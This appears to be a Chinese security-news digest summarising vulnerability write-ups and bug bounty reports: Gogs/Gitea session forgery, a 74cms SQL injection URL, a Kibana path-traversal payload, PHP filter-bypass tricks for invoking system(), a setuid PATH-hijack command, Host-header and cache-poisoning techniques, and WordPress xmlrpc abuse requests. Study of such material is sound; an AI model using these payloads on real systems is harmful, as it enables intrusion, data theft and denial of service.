文章: https://xz.aliyun.com/t/3725
基本原理跨目录上传伪造的管理员session文件,覆盖当前的session文件,导致权限提升。最初的issue地址在 https://github.com/go-gitea/gitea/issues/5569 ,在初步修复后被发现绕过方法见 https://github.com/gogs/gogs/commit/8c8c37a66b4cef6fc8a995ab1b4fd6e530c49c51 。
类似相关漏洞: GOGS/Gitea任意代码执行(CVE-2018-18925/6)及利用流程
2. 74cms 前台注入文章: https://xz.aliyun.com/t/3714
payload:
http://74cms.test/index.php?m=&c=jobs&a=jobs_list&lat=23.176465&range=20&lng=113.35038* PI() / 180 - map_x PI() / 180) / 2),2))) 1000) AS map_range FROM qs_jobs_search j WHERE (extractvalue (1,concat(0x7e,(SELECT USER()), 0x7e))) -- a 3. empirecms 后台getshell文章: https://xz.aliyun.com/t/3667
两处后台getshell,都是文件包含。第一处在导入系统模型处,第二处在自定义页面。
4. LearnX控件的漏洞挖掘过程文章: https://xz.aliyun.com/t/3708
利用了 COMRaider 工具fuzz。
5. Elasticsearch 核心插件Kibana 本地文件包含漏洞文章: https://www.anquanke.com/post/id/168291
payload:
/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd感觉鸡肋。需要登陆,包含 /etc/passwd 的话只会导致服务器错误,并不能读取内容。此外有文章说能RCE,但前提是要有上传 js 文件的点,然后再去包含这个 js 文件。
技巧 1. 利用Web应用中隐藏的文件夹和文件获取敏感信息文章: https://xz.aliyun.com/t/3677
简单总结:
源代码版本控制系统 git .gitignore svn IDE (集成开发环境)配置文件 jetbrain全家桶 netbeans 特定于项目和/或技术的配置和设置文件 nodejs项目的各种配置文件 GitLab CI/CD .gitlab-ci.yml Ruby on Rails database.yml macOS .DS_Store当然文章只总结了这么多,实际还有一大堆可能泄露的文件,按下不提。
2. 如何绕过代码过滤和WAF规则远程执行PHP代码文章: https://www.secjuice.com/php-rce-bypass-filters-sanitization-waf
简单小记:
system(“cat /etc$u/passwd”) 利用php字符串转换: \[0 7]{1,3} \x[0-9A-Fa-f]{1,2} \u{[0-9A-Fa-f]+} php中的 $var(args); 和 "string"(args); system(“ls”) -> “system”(“ls”) -> “\x73\x79\x73\x74\x65\x6d”(“ls”) 利用 () : “system”(“ls”) -> (system)(ls); 字符串拼接:(sy.(st).em)(ls) 注释:sys./ test /.tem(ls) 利用函数定义列表数组:get_defined_functions 第一步获取system的索引:get_defined_functions()[internal] | grep ‘system’ 第二步调用:get_defined_functions()[internal]1000 字符数组,拼凑。 Bug Bounty 1. 利用条件竞争获取money案例: https://hackerone.com/reports/429026
Burp截取请求,右键 Copy as curl command 。然后 (request) & (request) & (request) 。。。
2. 基于setuid为root的程序的提权漏洞地址: https://hackerone.com/reports/426944
keybase-redirector 的setuid为root权限。它通过 相对路径 来调用 fusermount 程序,同时对环境变量 $PATH 没做足够的验证。因此可以自己编写一个 fusermount.c 并编译出可执行文件 fusermount ,在环境变量中添加当前所在目录,利用 keybase-redirector 来执行伪造的 fusermount :
env PATH=.:$PATH /usr/bin/keybase-redirector /keybase 3. HOST头伪造案例:重置密码邮件连接 https://lightningsecurity.io/blog/host-header-injection/
一些网站提供了动态子域名,比如 a.com ,你可以申请到 xxx.a.com。在重置密码时,网站 a.com 为了确认是哪个用户发起的请求,直接采用了客户端提供的 HOST 头部。通过伪造 HOST 头部,比如 Host: b.com ,服务器将组装重置密码链接: http://b.com?reset_token=12345 ,并发往用户邮箱。当用户点击时, b.com 即可获取到 reset_token 。
4. 缓存投毒导致DDOS案例: https://hackerone.com/reports/409370
相关知识: https://xz.aliyun.com/t/2585 https://xz.aliyun.com/t/2877
添加头部 X-Forwarded-Port: 123 或者 X-Forwarded-Host: www.hackerone.com:123 利用缓存使用户被重定向从而DDOS
5. wordpress xmlrpc.php文件导致DDOS或爆破案例: https://hackerone.com/reports/448524
当发现 xmlrpc.php 时可以发送以下请求包来列举方法
POST /wp/xmlrpc.php HTTP/1.1 <methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall>如果获取到响应类似如下,说明xmlrpc启用:
<?xml version="1.0" encoding="UTF-8"?> <methodResponse> <params> <param> <value> <array><data> <value><string>pingback.ping</string></value> </data></array> </value> </param> </params> </methodResponse>其中利用如 pingback.ping 或 trackbacks 可造成DDOS
